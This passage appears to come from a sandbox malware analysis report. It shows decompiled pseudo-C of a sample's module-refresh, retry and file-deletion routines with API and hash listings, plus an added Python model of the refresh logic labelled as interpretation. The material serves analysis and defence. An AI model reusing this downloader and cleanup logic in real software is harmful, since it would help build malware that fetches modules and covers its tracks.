                          				if(GetFullPathNameW(_t159, 0x105, _t164 + 0x4fe, 0) == 0) {
                          					L29:
                          					_t78 =  *((intOrPtr*)(_t164 + 8));
                          					if( *((intOrPtr*)(_t164 + 8)) != 0) {
                          						_t78 = E006E91E0(_t78);
                          						_t164 = _t164 + 4;
                          					}
                          					E006F03D0(_t78);
                          					return _t129;
                          				}
                          				E006F4520(_t159, 0x51);
                          				_t165 = _t164 + 8;
                          				_push( *((intOrPtr*)(_t153 + 8)));
                          				E006F68E0(_t165 + 0xea, 0x105, _t159, _t155);
                          				_t164 = _t165 + 0x14;
                          				_t129 = 1;
                          				if( *((intOrPtr*)(_t153 + 0x24)) > 0) {
                          					_t131 = 0;
                          					do {
                          						 *(_t164 + 0xc) = 0;
                          						_t160 = _t153;
                          						E006F4520(_t164 + 0x26, 0x23);
                          						_t166 = _t164 + 8;
                          						 *(_t166 + 0x18) = _t131;
                          						_t132 = _t131 << 4;
                          						_push( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x2c)) + _t132 + 4)));
                          						_t153 = _t160;
                          						E006F68E0(_t166 + 0x304, 0x105, _t164 + 0x26, _t166 + 0xee);
                          						_t167 = _t166 + 0x14;
                          						_t91 = E006F0230(_t166 + 0x304, 0, 0, _t167 + 0xc);
                          						_t164 = _t167 + 0x10;
                          						if(_t91 == 0) {
                          							 *(_t164 + 0xc) = 0;
                          						}
                          						_t92 = E006F4E70();
                          						_t162 = _t132;
                          						if(_t92 -  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 0xc)) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t132 + 8) * 0x3c || E006F4E70() -  *(_t164 + 0xc) <=  *( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 8) * 0x3c) {
                          							_t94 = _t164 + 4;
                          							if( *((intOrPtr*)(_t164 + 0x71c)) != 0) {
                          								E006F7BE0(_t164 + 0x2fc, _t164 + 0x2fc, _t164 + 4, _t94);
                          								_t169 = _t164 + 0xc;
                          								E006F7C90( *((intOrPtr*)(_t169 + 4)),  *((intOrPtr*)(_t169 + 4)));
                          								_t164 = _t169 + 8;
                          							}
                          							goto L15;
                          						} else {
                          							_t124 = E006E97E0( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)));
                          							_t135 = _t164 + 4;
                          							if(_t124 == 0) {
                          								L15:
                          								_t95 =  *_t164;
                          								if( *_t164 != 0) {
                          									_t98 = E006F6F80(_t95,  *(_t164 + 0xc), _t164 + 0xc, _t164 + 0x10);
                          									_t164 = _t164 + 0x10;
                          									if(_t98 != 0) {
                          										if( *0x6f9c04 == 0) {
                          											if(GetFileAttributesW(_t164 + 0xea) == 0xffffffff) {
                          												_t113 = _t164 + 0xea;
                          												_t157 = _t113;
                          												PathRemoveBackslashW(_t113);
                          												CreateDirectoryW(_t157, 0);
                          												PathAddBackslashW(_t157);
                          											}
                          											E006F7C90( *((intOrPtr*)(_t164 + 4)),  *((intOrPtr*)(_t164 + 4)));
                          											_t168 = _t164 + 8;
                          											E006E6270(_t168 + 0x2fc, _t168 + 0x2fc,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t168 + 4)));
                          											_t164 = _t168 + 0xc;
                          										}
                          										_t102 = E006F4E70();
                          										_t143 =  *((intOrPtr*)(_t153 + 0x2c));
                          										 *((intOrPtr*)(_t143 + _t162 + 0xc)) = _t102;
                          										_t103 =  *(_t164 + 0x10);
                          										_t151 =  *((intOrPtr*)(_t164 + 8));
                          										_t164 = _t164 - 0x10;
                          										 *((intOrPtr*)(_t164 + 4)) =  *((intOrPtr*)(_t143 + _t162));
                          										 *(_t164 + 0xc) = _t103;
                          										 *((intOrPtr*)(_t164 + 8)) = _t151;
                          										E006EE0F0(_t153);
                          										_t105 =  *((intOrPtr*)(_t164 + 8));
                          										if( *((intOrPtr*)(_t164 + 8)) != 0) {
                          											E006E91E0(_t105);
                          											_t164 = _t164 + 4;
                          											 *((intOrPtr*)(_t164 + 8)) = 0;
                          											 *(_t164 + 0x10) = 0;
                          										}
                          									}
                          									_t99 =  *_t164;
                          									if( *_t164 != 0) {
                          										E006E91E0(_t99);
                          										_t164 = _t164 + 4;
                          										 *_t164 = 0;
                          										 *((intOrPtr*)(_t164 + 4)) = 0;
                          									}
                          								}
                          								goto L25;
                          							}
                          							_t125 =  *((intOrPtr*)(_t153 + 0x48));
                          							E006F5C00( *((intOrPtr*)(_t125 + 8)));
                          							if(_t125 == 0) {
                          								goto L25;
                          							} else {
                          								_t158 = 0;
                          								 *((intOrPtr*)(_t164 + 0x14)) = _t125;
                          								while(1) {
                          									_push(_t135);
                          									_push(_t164 + 4);
                          									_t127 = E006F4610( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)), 5,  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 4)));
                          									_t164 = _t164 + 0x14;
                          									if(_t127 != 0) {
                          										break;
                          									}
                          									Sleep(0xbb8);
                          									_t158 = _t158 + 1;
                          									if(_t158 < 2) {
                          										continue;
                          									}
                          									break;
                          								}
                          								E006E91E0( *((intOrPtr*)(_t164 + 0x14)));
                          								_t164 = _t164 + 4;
                          								goto L15;
                          							}
                          						}
                          						L25:
                          						_t131 =  *((intOrPtr*)(_t164 + 0x18)) + 1;
                          					} while (_t131 <  *((intOrPtr*)(_t153 + 0x24)));
                          					_t96 =  *_t164;
                          					if( *_t164 != 0) {
                          						E006E91E0(_t96);
                          						_t164 = _t164 + 4;
                          					}
                          					_t129 = 1;
                          				}
                          			}

                          Instruction addresses for the C-code lines above, in order (0x00000000 = no mapped address):
                          0x006f502a 0x006f502c 0x006f5032 0x006f5036 0x006f5039 0x006f503d 0x006f5041 0x006f5046 0x006f504d 0x006f5052
                          0x006f5055 0x006f506c 0x006f52ef 0x006f52ef 0x006f52f5 0x006f52f8 0x006f52fd 0x006f52fd 0x006f5304 0x006f5315
                          0x006f5315 0x006f5075 0x006f507a 0x006f5084 0x006f508f 0x006f5094 0x006f5099 0x006f509e 0x006f50a4 0x006f50a6
                          0x006f50a8 0x006f50b2 0x006f50b7 0x006f50bc 0x006f50c2 0x006f50c6 0x006f50c9 0x006f50e2 0x006f50e7 0x006f50ec
                          0x006f50f7 0x006f50fc 0x006f5101 0x006f5103 0x006f5103 0x006f510b 0x006f5113 0x006f5120 0x006f51b3 0x006f51b7
                          0x006f51c7 0x006f51cc 0x006f51d7 0x006f51dc 0x006f51dc 0x00000000 0x006f513b 0x006f5141 0x006f5148 0x006f514c
                          0x006f51df 0x006f51df 0x006f51e4 0x006f51f9 0x006f51fe 0x006f5203 0x006f5210 0x006f5223 0x006f5225 0x006f522c
                          0x006f522f 0x006f5238 0x006f523f 0x006f523f 0x006f524d 0x006f5252 0x006f5265 0x006f526a 0x006f526a 0x006f526d
                          0x006f5272 0x006f5275 0x006f5279 0x006f527d 0x006f5284 0x006f5287 0x006f528d 0x006f5291 0x006f5295 0x006f529a
                          0x006f52a0 0x006f52a3 0x006f52a8 0x006f52ad 0x006f52b1 0x006f52b1 0x006f52a0 0x006f52b5 0x006f52ba 0x006f52bd
                          0x006f52c2 0x006f52c7 0x006f52ca 0x006f52ca 0x006f52ba 0x00000000 0x006f51e4 0x006f5152 0x006f5158 0x006f515f
                          0x00000000 0x006f5165 0x006f5165 0x006f5167 0x006f516b 0x006f5171 0x006f5176 0x006f5180 0x006f5185 0x006f518a
                          0x00000000 0x00000000 0x006f5191 0x006f5197 0x006f519b 0x00000000 0x00000000 0x00000000 0x006f519b 0x006f51a1
                          0x006f51a6 0x00000000 0x006f51a6 0x006f515f 0x006f52ce 0x006f52d2 0x006f52d3 0x006f52dc 0x006f52e1 0x006f52e4
                          0x006f52e9 0x006f52e9 0x006f52ee 0x006f52ee

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006F5064
                            • Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15
                            • Part of subcall function 006F0230: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006F0248
                            • Part of subcall function 006F0230: GetFileTime.KERNEL32(00000000,?,?,?,?,?,006F0385,00000000), ref: 006F0267
                            • Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F028C
                            • Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02B0
                            • Part of subcall function 006F0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02D3
                            • Part of subcall function 006F0230: CloseHandle.KERNEL32(00000000), ref: 006F02E5
                          • Sleep.KERNEL32(00000BB8), ref: 006F5191
                          • GetFileAttributesW.KERNEL32(?), ref: 006F521A
                          • PathRemoveBackslashW.SHLWAPI(?), ref: 006F522F
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 006F5238
                          • PathAddBackslashW.SHLWAPI(?), ref: 006F523F
                            • Part of subcall function 006F7BE0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F7C03
                            • Part of subcall function 006F7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 006F7C1D
                            • Part of subcall function 006F7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 006F7C28
                            • Part of subcall function 006F7BE0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7C4A
                            • Part of subcall function 006F7BE0: CloseHandle.KERNEL32(00000000), ref: 006F7C6D
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$CreatePath_aulldiv$BackslashCloseHandlePointer$AttributesByteCharDirectoryFullMultiNameReadRemoveSleepTimeWide
                          • String ID:
                          • API String ID: 2481069558-0
                          • Opcode ID: f88055cc64d2c3f3778c61ae76e4cfea90d1375e177c0a37729359c4fcde7bdf
                          • Instruction ID: 2a4252c09a59079e343974639da44f63c7bca5fb72cbded6120852705c6620a1
                          • Opcode Fuzzy Hash: f88055cc64d2c3f3778c61ae76e4cfea90d1375e177c0a37729359c4fcde7bdf
                          • Instruction Fuzzy Hash: C581C7B1904309AFC750EF64DC85AABB7EAAF44344F00492DFA49C7252EB30ED04CB66
                          Uniqueness

                          Uniqueness Score: -1.00%
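The following is an added illustration written for this page; it is not code from the sample, from Joe Sandbox, or from any published analysis of this binary. It models the module-refresh decision that the decompiled E006F5020 above appears to make. The mapping of decompiled helpers to behaviour is an assumption drawn from the visible constants: E006F0230 opens the module file, reads its FILETIME and divides by 0x989680 (10,000,000, so 100 ns ticks become seconds); E006F4E70 is taken to return the current time in the same unit; the table entry field at +0x8 is multiplied by 0x3c (60), so it is read here as an interval in minutes; the field at +0xc holds the last load time; E006F4610 is the fetch that is retried after Sleep(0xbb8) = 3000 ms, at most twice. The names ModuleRecord, module_is_stale, fetch_module_with_retry and refresh_cycle are hypothetical.

```python
# Added illustration, not code from the sample or the Joe Sandbox report.
# Interpretation of the decompiled E006F5020 (assumptions, see lead-in):
#   E006F0230  -> module file mtime: FILETIME ticks // 0x989680 -> seconds, 0 on failure
#   E006F4E70  -> current time in the same unit (assumed)
#   entry+0x8  -> refresh interval in minutes (the code multiplies by 0x3c == 60)
#   entry+0xc  -> time of the last successful load
#   E006F4610  -> fetch from the controller, retried after Sleep(0xbb8) == 3000 ms
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

FILETIME_TICKS_PER_SECOND = 0x989680       # 10,000,000 ticks of 100 ns per second
FILETIME_UNIX_EPOCH_SECONDS = 11644473600  # seconds from 1601-01-01 to 1970-01-01
RETRY_SLEEP_MS = 0xBB8                     # 3000 ms, the constant passed to Sleep()
MAX_ATTEMPTS = 2                           # the retry counter in E006F5020 stops at 2


def filetime_to_unix(filetime: int) -> int:
    """Mirror the _aulldiv(..., 0x989680) step, then shift the epoch to 1970."""
    return filetime // FILETIME_TICKS_PER_SECOND - FILETIME_UNIX_EPOCH_SECONDS


@dataclass
class ModuleRecord:
    """One 16-byte entry of the table at object+0x2c (field meanings are assumed)."""
    name: str
    interval_minutes: int   # entry+0x8
    last_refresh: int       # entry+0xc, Unix seconds; rewritten after a successful load


def module_is_stale(rec: ModuleRecord, now: int, file_mtime: int) -> bool:
    """A refresh happens only when both halves of the decompiled `||` test fail:
    the in-memory timestamp AND the on-disk file must be older than the window.
    file_mtime == 0 models the decompiled code zeroing the slot when the file
    cannot be opened, so a missing file always counts as stale on that side."""
    window_seconds = rec.interval_minutes * 0x3C
    in_memory_fresh = now - rec.last_refresh <= window_seconds
    on_disk_fresh = now - file_mtime <= window_seconds
    return not (in_memory_fresh or on_disk_fresh)


def fetch_module_with_retry(fetch: Callable[[str], Optional[bytes]], name: str,
                            sleep_ms: Callable[[int], None]) -> Optional[bytes]:
    """Replicates the retry loop: try, sleep 3 s on failure, give up after two tries.
    sleep_ms is injected so the model can be exercised without real delays."""
    attempts = 0
    while True:
        data = fetch(name)
        if data is not None:
            return data
        sleep_ms(RETRY_SLEEP_MS)   # the Sleep(0xbb8) runs after every failed attempt
        attempts += 1
        if attempts < MAX_ATTEMPTS:
            continue
        return None


def refresh_cycle(records: List[ModuleRecord], now: int, mtimes: Dict[str, int],
                  fetch: Callable[[str], Optional[bytes]],
                  sleep_ms: Callable[[int], None]) -> List[str]:
    """Walk the table once, as the do/while in E006F5020 does, and return the
    names of modules that were re-fetched. mtimes maps name -> Unix mtime of the
    module file on disk (0 = file missing or unreadable, as in E006F0230)."""
    refreshed: List[str] = []
    for rec in records:
        if not module_is_stale(rec, now, mtimes.get(rec.name, 0)):
            continue
        if fetch_module_with_retry(fetch, rec.name, sleep_ms) is not None:
            rec.last_refresh = now        # the store to entry+0xc after a successful load
            refreshed.append(rec.name)
    return refreshed
```

Two things an analyst can take from the model: the staleness window is minute-granular (the multiply by 0x3c), so a module whose file is deleted on disk is re-fetched on the next pass even when the in-memory timestamp is old; and a failed fetch costs exactly two attempts spaced 3 s apart, which is the delay to expect between the Sleep(0xbb8) calls when watching the process.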

                          C-Code - Quality: 83%
                          			E006ED6B0(signed int* __ecx) {
                          				signed int _t38;
                          				signed int _t41;
                          				signed int _t43;
                          				signed int _t47;
                          				WCHAR* _t48;
                          				signed int _t53;
                          				signed int _t71;
                          				signed int _t72;
                          				signed int _t74;
                          				signed int _t75;
                          				signed int _t78;
                          				signed int _t80;
                          				signed int _t82;
                          				signed int* _t83;
                          				signed int* _t84;
                          				signed int _t85;
                          				signed int _t88;
                          				WCHAR* _t89;
                          				void* _t91;
                          				signed int* _t92;
                          				signed int _t93;
                          				signed int** _t94;
                          				signed int** _t97;
                          				signed int** _t98;
                          				signed int** _t99;
                          
                          				_t92 = _t94[0x1c3];
                          				_t84 = __ecx;
                          				if(_t92 != 0) {
                          					 *0x6f9d54(0x6f9bbc);
                          				}
                          				_t38 =  *_t84;
                          				if(_t38 == 0) {
                          					L6:
                          					_t85 = 0;
                          				} else {
                          					_t74 = _t94[0x1c4];
                          					_t82 = _t94[0x1c2];
                          					_t80 = _t84[1];
                          					_t71 = 0;
                          					 *_t94 = _t84;
                          					while( *((intOrPtr*)(_t80 + _t71 * 4)) != _t82) {
                          						_t71 = _t71 + 1;
                          						if(_t71 < _t38) {
                          							continue;
                          						} else {
                          							goto L6;
                          						}
                          						goto L28;
                          					}
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						L18:
                          						__eflags = _t82;
                          						if(_t82 != 0) {
                          							goto L19;
                          						}
                          					} else {
                          						_t78 =  *0x6f9c04; // 0x0
                          						__eflags = _t78;
                          						if(_t78 != 0) {
                          							goto L18;
                          						} else {
                          							_push( *((intOrPtr*)(_t82 + 8)));
                          							_t47 = E006EC720();
                          							__eflags = _t47;
                          							if(__eflags != 0) {
                          								_t88 = _t47;
                          								_t48 = E006F0520(__eflags, _t47);
                          								__eflags = _t48;
                          								if(_t48 != 0) {
                          									_t94[2] = _t88;
                          									_t94[1] = _t48;
                          									DeleteFileW(_t48);
                          									_t89 =  &(_t94[3]);
                          									E006F4520(_t89, 0x50);
                          									_t97 =  &(_t94[2]);
                          									_t53 = GetFullPathNameW(_t89, 0x105,  &(_t97[0x13a]), 0);
                          									__eflags = _t53;
                          									if(_t53 != 0) {
                          										E006F4520( &(_t97[4]), 0x51);
                          										_t98 =  &(_t97[2]);
                          										_push( *((intOrPtr*)(_t82 + 8)));
                          										E006F68E0( &(_t98[0x35]), 0x105,  &(_t97[4]),  &(_t98[0x13b]));
                          										_t97 =  &(_t98[5]);
                          										__eflags =  *(_t82 + 0x24);
                          										if( *(_t82 + 0x24) > 0) {
                          											_t93 = 0;
                          											__eflags = 0;
                          											_t91 = 4;
                          											do {
                          												E006F4520( &(_t97[4]), 0x23);
                          												_t99 =  &(_t97[2]);
                          												_push( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x2c)) + _t91)));
                          												E006F68E0( &(_t99[0xbc]), 0x105,  &(_t99[5]),  &(_t99[0x36]));
                          												_t97 =  &(_t99[5]);
                          												DeleteFileW( &(_t97[0xb8]));
                          												_t93 = _t93 + 1;
                          												_t91 = _t91 + 0x10;
                          												__eflags = _t93 -  *(_t82 + 0x24);
                          											} while (_t93 <  *(_t82 + 0x24));
                          										}
                          										RemoveDirectoryW( &(_t97[0x35]));
                          										_t92 = _t97[0x1c3];
                          									}
                          									E006E91E0(_t97[1]);
                          									_t94 =  &(_t97[1]);
                          									_t88 = _t94[2];
                          								}
                          								E006E91E0(_t88);
                          								_t94 =  &(_t94[1]);
                          							}
                          							L19:
                          							E006EB860(_t82);
                          							L006F7400(_t82);
                          							_t94 =  &(_t94[1]);
                          							_t38 =  *( *_t94);
                          						}
                          					}
                          					_t83 =  *_t94;
                          					_t75 = _t38 - 1;
                          					__eflags = _t71 - _t75;
                          					 *_t83 = _t75;
                          					if(_t71 < _t75) {
                          						_t72 = _t71 + 1;
                          						__eflags = _t72;
                          						do {
                          							 *((intOrPtr*)(_t83[1] + _t72 * 4 - 4)) =  *((intOrPtr*)(_t83[1] + _t72 * 4));
                          							_t72 = _t72 + 1;
                          							__eflags = _t38 - _t72;
                          						} while (_t38 != _t72);
                          					}
                          					_t41 = _t83[1];
                          					__eflags = _t75;
                          					if(_t75 == 0) {
                          						E006E91E0(_t41);
                          						_t43 = 0;
                          						__eflags = 0;
                          						goto L27;
                          					} else {
                          						_t43 = E006E3180(_t75 << 2, _t41);
                          						__eflags = _t43;
                          						if(_t43 != 0) {
                          							L27:
                          							_t83[1] = _t43;
                          							_t85 = 1;
                          							__eflags = 1;
                          						} else {
                          							goto L6;
                          						}
                          					}
                          				}
                          				L28:
                          				if(_t92 != 0) {
                          					 *0x6f9d9c(0x6f9bbc);
                          				}
                          				return _t85;
                          			}

                          Instruction addresses for the C-code lines above, in order (0x00000000 = no mapped address):
                          0x006ed6ba 0x006ed6c1 0x006ed6c5 0x006ed6cc 0x006ed6cc 0x006ed6d2 0x006ed6d6 0x006ed6f8 0x006ed6f8 0x006ed6d8
                          0x006ed6d8 0x006ed6df 0x006ed6e6 0x006ed6e9 0x006ed6eb 0x006ed6ee 0x006ed6f3 0x006ed6f6 0x00000000 0x00000000
                          0x00000000 0x00000000 0x00000000 0x006ed6f6 0x006ed6ff 0x006ed701 0x006ed82e 0x006ed82e 0x006ed830 0x00000000
                          0x00000000 0x006ed707 0x006ed707 0x006ed70d 0x006ed70f 0x00000000 0x006ed715 0x006ed715 0x006ed718 0x006ed71d
                          0x006ed71f 0x006ed725 0x006ed728 0x006ed72d 0x006ed72f 0x006ed735 0x006ed739 0x006ed73e 0x006ed744 0x006ed74b
                          0x006ed750 0x006ed763 0x006ed769 0x006ed76b 0x006ed77a 0x006ed77f 0x006ed789 0x006ed79b 0x006ed7a0 0x006ed7a3
                          0x006ed7a7
                          0x006ed7a9
                          0x006ed7a9
                          0x006ed7ab
                          0x006ed7b0
                          0x006ed7b7
                          0x006ed7bc
                          0x006ed7c2
                          0x006ed7df
                          0x006ed7e4
                          0x006ed7ef
                          0x006ed7f5
                          0x006ed7f6
                          0x006ed7f9
                          0x006ed7f9
                          0x006ed7b0
                          0x006ed806
                          0x006ed80c
                          0x006ed80c
                          0x006ed817
                          0x006ed81c
                          0x006ed81f
                          0x006ed81f
                          0x006ed824
                          0x006ed829
                          0x006ed829
                          0x006ed832
                          0x006ed834
                          0x006ed83a
                          0x006ed83f
                          0x006ed845
                          0x006ed845
                          0x006ed70f
                          0x006ed847
                          0x006ed84a
                          0x006ed84d
                          0x006ed84f
                          0x006ed851
                          0x006ed853
                          0x006ed853
                          0x006ed854
                          0x006ed85a
                          0x006ed85e
                          0x006ed85f
                          0x006ed85f
                          0x006ed854
                          0x006ed863
                          0x006ed866
                          0x006ed868
                          0x006ed881
                          0x006ed889
                          0x006ed889
                          0x00000000
                          0x006ed86a
                          0x006ed86f
                          0x006ed877
                          0x006ed879
                          0x006ed88b
                          0x006ed88d
                          0x006ed890
                          0x006ed890
                          0x006ed87b
                          0x00000000
                          0x006ed87b
                          0x006ed879
                          0x006ed868
                          0x006ed891
                          0x006ed893
                          0x006ed89a
                          0x006ed89a
                          0x006ed8ac

                          APIs
                          • RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006ED6CC
                          • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 006ED73E
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006ED763
                          • DeleteFileW.KERNEL32(?), ref: 006ED7EF
                          • RemoveDirectoryW.KERNEL32(?), ref: 006ED806
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006ED89A
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CriticalDeleteFileSection$DirectoryEnterFullLeaveNamePathRemove
                          • String ID:
                          • API String ID: 328185309-0
                          • Opcode ID: c898cfe6f516189def7ecad6b8f24f898669ec5f6377e5c2b75e1dd5c831e632
                          • Instruction ID: fa968d5718c3c07d2196704e92dc421880988ea60fd59273b60315665d6a004b
                          • Opcode Fuzzy Hash: c898cfe6f516189def7ecad6b8f24f898669ec5f6377e5c2b75e1dd5c831e632
                          • Instruction Fuzzy Hash: 7F51E4B5905345ABCB20EF65DC45BABB3AAEF44304F04042DFA49C3341EB70E914CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E006F7410(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				short _v1040;
                          				struct _OVERLAPPED* _v1044;
                          				intOrPtr _t25;
                          				void* _t27;
                          				long _t29;
                          				void* _t34;
                          				long _t41;
                          				intOrPtr _t42;
                          				short* _t43;
                          				void* _t44;
                          				void* _t45;
                          				signed int _t46;
                          				signed int _t47;
                          				void* _t49;
                          				signed int _t50;
                          				signed int _t51;
                          				void* _t52;
                          				intOrPtr _t53;
                          				void* _t54;
                          				DWORD* _t55;
                          
                          				_t53 = _a12;
                          				_t25 = _a8;
                          				_t42 = _a4;
                          				_t44 = 0xfffffc00;
                          				_v1044 = 0;
                          				while(1) {
                          					_t50 =  *(_t42 + _t44 + 0x400) & 0x0000ffff;
                          					if(_t50 == 0) {
                          						break;
                          					}
                          					 *(_t54 + _t44 + 0x404) = _t50;
                          					_t44 = _t44 + 2;
                          					if(_t44 != 0) {
                          						continue;
                          					} else {
                          						 *((short*)(_t54 + _t44 + 0x402)) = 0;
                          					}
                          					L20:
                          					return 0;
                          				}
                          				 *(_t54 + _t44 + 0x404) = 0;
                          				_t43 =  &_v1040;
                          				_t45 = 0x200;
                          				while( *_t43 != 0) {
                          					_t43 = _t43 + 2;
                          					_t45 = _t45 - 1;
                          					if(_t45 != 0) {
                          						continue;
                          					} else {
                          					}
                          					goto L20;
                          				}
                          				_t46 = 0;
                          				while(1) {
                          					_t51 = _t46;
                          					_t47 =  *(_t25 + _t46 * 2) & 0x0000ffff;
                          					if(_t47 == 0) {
                          						break;
                          					}
                          					 *(_t43 + _t51 * 2) = _t47;
                          					_t17 = _t51 + 1; // 0x1
                          					_t46 = _t17;
                          					if(_t45 != _t46) {
                          						continue;
                          					} else {
                          						 *(_t43 + _t51 * 2) = 0;
                          					}
                          					goto L20;
                          				}
                          				 *(_t43 + _t51 * 2) = 0;
                          				_t27 = CreateFileW( &_v1040, 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t27 != 0xffffffff) {
                          					_t52 = _t27;
                          					_t29 = SetFilePointer(_t27, 0, 0, 2);
                          					if(_t29 == 0xffffffff) {
                          						L19:
                          						CloseHandle(_t52);
                          					} else {
                          						_t41 = _t29;
                          						SetFilePointer(_t52, 0, 0, 0);
                          						_t23 = _t41 - 1; // -1
                          						if(_t23 > 0x4ffffe) {
                          							goto L19;
                          						} else {
                          							_t34 = E006E3180(_t41, 0);
                          							_t55 = _t54 + 8;
                          							if(_t34 == 0) {
                          								goto L19;
                          							} else {
                          								_t49 = _t34;
                          								if(ReadFile(_t52, _t49, _t41, _t55, 0) == 0) {
                          									E006E91E0(_t49);
                          									goto L19;
                          								} else {
                          									CloseHandle(_t52);
                          									_push(_t53);
                          									_push(_v1044);
                          									_push(_t49);
                          									E006F1240();
                          									E006E91E0(_t49);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				goto L20;
                          			}

                          0x006f741a
                          0x006f7421
                          0x006f7428
                          0x006f742f
                          0x006f7434
                          0x006f743b
                          0x006f743b
                          0x006f7446
                          0x00000000
                          0x00000000
                          0x006f7448
                          0x006f7450
                          0x006f7453
                          0x00000000
                          0x006f7455
                          0x006f7455
                          0x006f7455
                          0x006f7550
                          0x006f755c
                          0x006f755c
                          0x006f7464
                          0x006f746e
                          0x006f7472
                          0x006f7477
                          0x006f747d
                          0x006f7480
                          0x006f7481
                          0x00000000
                          0x00000000
                          0x006f7483
                          0x00000000
                          0x006f7481
                          0x006f7488
                          0x006f748a
                          0x006f748a
                          0x006f748c
                          0x006f7493
                          0x00000000
                          0x00000000
                          0x006f7495
                          0x006f7499
                          0x006f7499
                          0x006f749e
                          0x00000000
                          0x006f74a0
                          0x006f74a0
                          0x006f74a0
                          0x00000000
                          0x006f749e
                          0x006f74b1
                          0x006f74c8
                          0x006f74d1
                          0x006f74d3
                          0x006f74da
                          0x006f74e3
                          0x006f7549
                          0x006f754a
                          0x006f74e5
                          0x006f74e5
                          0x006f74ed
                          0x006f74f3
                          0x006f74fb
                          0x00000000
                          0x006f74fd
                          0x006f7500
                          0x006f7505
                          0x006f750a
                          0x00000000
                          0x006f750c
                          0x006f750c
                          0x006f751e
                          0x006f7541
                          0x00000000
                          0x006f7520
                          0x006f7521
                          0x006f7527
                          0x006f7528
                          0x006f752c
                          0x006f752d
                          0x006f7536
                          0x006f753b
                          0x006f751e
                          0x006f750a
                          0x006f74fb
                          0x006f74e3
                          0x00000000

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F74C8
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006F74DA
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F74ED
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7516
                          • CloseHandle.KERNEL32(00000000), ref: 006F7521
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          • CloseHandle.KERNEL32(00000000), ref: 006F754A
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$CloseHandlePointer$CreateFreeHeapRead
                          • String ID:
                          • API String ID: 3957287750-0
                          • Opcode ID: d6d8efed4a75ffb26dc6a43aae416f68440588fe59fdcc36e8332d0fc107e92e
                          • Instruction ID: db2dd06958ec1639b873d59aee0b5c020d13c8cd3438f311da7f46e57198ccc3
                          • Opcode Fuzzy Hash: d6d8efed4a75ffb26dc6a43aae416f68440588fe59fdcc36e8332d0fc107e92e
                          • Instruction Fuzzy Hash: EA31D4B1108204A6E3305B25EC49FFB76EEEFC1718F24412CF74996291EB359D06C2AA
                          Uniqueness

                          Uniqueness Score: -1.00%
